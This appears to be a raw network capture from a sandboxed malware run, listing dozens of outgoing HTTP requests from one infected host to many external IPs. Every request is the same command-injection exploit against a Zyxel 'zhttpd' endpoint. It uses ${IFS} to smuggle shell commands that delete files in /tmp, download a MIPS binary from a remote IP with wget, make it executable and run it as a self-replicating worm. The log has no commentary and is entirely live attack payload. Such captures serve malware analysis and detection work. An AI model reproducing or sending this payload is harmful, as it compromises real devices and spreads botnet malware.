                                                Jan 28, 2024 10:16:24.801794052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4341192.168.2.235697299.92.74.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801805019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4342192.168.2.235220669.168.72.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801831961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4343192.168.2.2358754142.35.197.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801851034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4344192.168.2.2339078125.14.63.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801881075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4345192.168.2.233674692.251.132.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801907063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4346192.168.2.2351374204.230.243.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801934004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4347192.168.2.233519863.91.198.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802162886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4348192.168.2.233350475.181.87.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802182913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4349192.168.2.2355204129.153.9.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802195072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4350192.168.2.23493044.114.166.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802247047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4351192.168.2.233970259.20.36.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802277088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4352192.168.2.23575428.21.148.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802320957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4353192.168.2.235968866.120.6.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802341938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4354192.168.2.235818273.112.124.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802344084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4355192.168.2.2355394105.138.124.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802365065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4356192.168.2.2359180201.177.170.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802408934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4357192.168.2.235009844.229.73.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802428007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4358192.168.2.2345288223.12.32.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802467108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4359192.168.2.2348408191.188.18.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802489996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4360192.168.2.2344046199.130.233.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802516937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4361192.168.2.233381093.132.54.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802562952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4362192.168.2.2354590138.81.196.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802578926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4363192.168.2.2354194116.162.195.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802608967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4364192.168.2.2351394195.137.59.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802622080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4365192.168.2.2343022144.81.46.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802638054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4366192.168.2.2355116167.187.75.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.802692890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4367192.168.2.234066480.243.37.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.805591106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4368192.168.2.233684844.242.209.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.805598974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4369192.168.2.233992469.208.194.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.806008101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4370192.168.2.2349316150.102.88.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812618017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4371192.168.2.233715627.43.122.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812638044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4372192.168.2.2354836109.158.203.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812683105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4373192.168.2.2340588217.237.83.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812700033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4374192.168.2.235476231.200.247.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812722921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4375192.168.2.2356698217.93.243.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812740088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4376192.168.2.235004232.46.241.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812757969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4377192.168.2.2333406217.173.50.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812789917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4378192.168.2.235388836.90.88.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812808990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4379192.168.2.23505801.238.190.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812843084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4380192.168.2.2347468207.54.92.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812864065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4381192.168.2.234073066.55.134.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812886953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4382192.168.2.2360444204.109.7.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812899113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4383192.168.2.233658214.178.89.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812943935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4384192.168.2.2355882220.178.81.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812973022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4385192.168.2.234315690.246.24.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.812995911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4386192.168.2.2344964220.201.29.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813045025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4387192.168.2.2347426220.209.86.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813071966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4388192.168.2.233682088.74.103.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813096046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4389192.168.2.2342464120.187.135.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813121080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4390192.168.2.2338180218.73.18.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813143969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4391192.168.2.235508644.212.214.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813160896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4392192.168.2.2345054204.84.148.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813199997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4393192.168.2.2337978161.206.24.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813199997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4394192.168.2.2350706197.8.196.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813229084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4395192.168.2.234514469.154.28.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813271999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4396192.168.2.2335446208.121.232.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813303947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4397192.168.2.234680685.178.60.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813343048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4398192.168.2.234506425.146.141.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813375950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4399192.168.2.2342600155.59.190.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813394070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4400192.168.2.2352208136.16.237.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813420057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4401192.168.2.2352108220.190.6.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.813453913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4402192.168.2.2346332187.130.160.141443
                                                TimestampBytes transferredDirectionData
